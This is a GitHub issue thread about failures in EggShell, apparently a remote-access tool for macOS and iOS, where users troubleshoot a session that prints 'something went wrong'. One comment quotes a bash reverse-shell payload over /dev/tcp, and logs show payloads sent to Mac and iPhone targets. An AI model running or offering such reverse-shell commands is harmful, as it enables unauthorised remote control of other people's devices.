### ISSUE TITLE
Failed

### ISSUE THREAD

**Issue by MircoCagni** [neoneggplant/EggShell#44]
I have try to use this exploit on a VM with Mac OS X Sierra, but the responde is wrong error

**Comment by neoneggplant** [comment]
can you be more specific?

**Comment by MircoCagni** [comment]
Yes, sorry, i have create a payload with my Parrot OS using eggshell "bash &> /dev/tcp/192.168.0.10/4444 0>&1 " and i have start server. But When i go to write my payload in OS X terminal the response is this:

"
[*]  Listening on port 4444
[*]  Connecting to 192.168.0.11
[*]  Detected OS X
[*]  Sending Payload
[*]  Waiting For Connection. . . 
[*]  Type "help" for commands
went wrong> "

and if i lunch a command for example "pwd" it print the error "something went wrong"

**Comment by neoneggplant** [comment]
ok, I will look into this

**Comment by ShellBear** [comment]
Looks like the same error i got with ls

**Comment by neoneggplant** [comment]
this is on startup though, its not receiving the computer name

**Comment by MircoCagni** [comment]
How can I solve this problem

**Comment by neoneggplant** [comment]
I don't know what is causing it yet

**Comment by neoneggplant** [comment]
I will look into it

**Comment by Loveforkeeps** [comment]
I try to use it to  iPhone5(iOS7.1.2) and Mac OS X Sierra , went wrong also

```
EggShell> 1
SET LHOST (Leave blank for 10.100.78.208)>192.168.2.1
[*]  LHOST = 192.168.2.1
SET LPORT (Leave blank for 4444)>
[*]  LPORT = 4444
[*]  Listening on port 4444...
[*]  Connecting to 192.168.2.7
[*]  Detected iOS
[*]  Sending Payload
[*]  Waiting For Connection...
[*]  type "help" for commands
went wrong> ls
something went wrong
went wrong> 
```

**Comment by ShellBear** [comment]
I have exactly the same issue
